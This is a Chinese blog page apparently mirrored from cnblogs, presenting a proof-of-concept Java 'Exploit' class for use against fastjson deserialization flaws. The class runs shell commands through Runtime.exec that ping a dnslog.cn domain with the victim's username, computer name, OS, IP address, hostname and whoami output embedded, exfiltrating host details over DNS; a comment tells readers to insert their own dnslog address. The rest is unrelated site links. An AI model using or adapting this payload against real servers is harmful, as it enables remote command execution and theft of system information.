zoukankan      html  css  js  c++  java
  • fastjson ping外带信息poc

    public class Exploit {
        public Exploit(){
            String base_url = ".egpkd5.dnslog.cn"; //你的dnslog地址
            String win_dnslog = "windows" + base_url;
            // windows
            try{
                String[] commands = { "cmd", "/c", "ping username.%username%." + win_dnslog};
                Runtime.getRuntime().exec(commands);
            }catch(Exception e){
                // e.printStackTrace();
            }
            try{
                String[] commands = { "cmd", "/c", "ping computername.%computername%." + win_dnslog};
                Runtime.getRuntime().exec(commands);
            }catch(Exception e){
                // e.printStackTrace();
            }
            try{
                String[] commands = { "cmd", "/c", "ping os.%os%." + win_dnslog};
                Runtime.getRuntime().exec(commands);
            }catch(Exception e){
                // e.printStackTrace();
            }
            
            
            // linux
            String linux_dnslog = "linux" + base_url;
            try{
    
                String[] commands = { "/bin/sh", "-c", "ping ip.`ifconfig eth0|grep 'inet '|awk '{ print $2}'|awk -F: '{print $2}'|awk '{ gsub(/\./,"-"); print $0 }'`." + linux_dnslog};
                Runtime.getRuntime().exec(commands);
            }catch(Exception e){
                // e.printStackTrace();
            }
            try{
                String[] commands = { "/bin/sh", "-c", "ping ip.`ifconfig eth0|grep 'inet '|awk '{ print $2}'|awk '{ gsub(/\./,"-"); print $0 }'`." + linux_dnslog};
                Runtime.getRuntime().exec(commands);
            }catch(Exception e){
                // e.printStackTrace();
            }
            try{
                String[] commands = { "/bin/sh", "-c", "ping hostname.`cat /proc/sys/kernel/hostname`." + linux_dnslog};
                Runtime.getRuntime().exec(commands);
            }catch(Exception e){
                // e.printStackTrace();
            }
            try{
                String[] commands = { "/bin/sh", "-c", "ping user.`whoami`." + linux_dnslog};
                Runtime.getRuntime().exec(commands);
            }catch(Exception e){
                // e.printStackTrace();
            }
        }
        public static void main(String[] args){
            Exploit e = new Exploit();
        }
    }
    
  • 相关阅读:
    GROUP BY 和 ORDER BY一起使用
    MySQL中表的复制以及大型数据表的备份教程
    常用sql
    MySQL 数据类型(float)的注意事项
    MySQL VARCHAR字段最大长度到底是多少
    设计-Int(4)和Int(11)谁更美
    5.Flask-Migrate
    4.alembic数据迁移工具
    3.Flask-SQLAlchemy
    2.Flask jinjia2模板
  • 原文地址:https://www.cnblogs.com/huim/p/12000884.html
Copyright © 2011-2022 走看看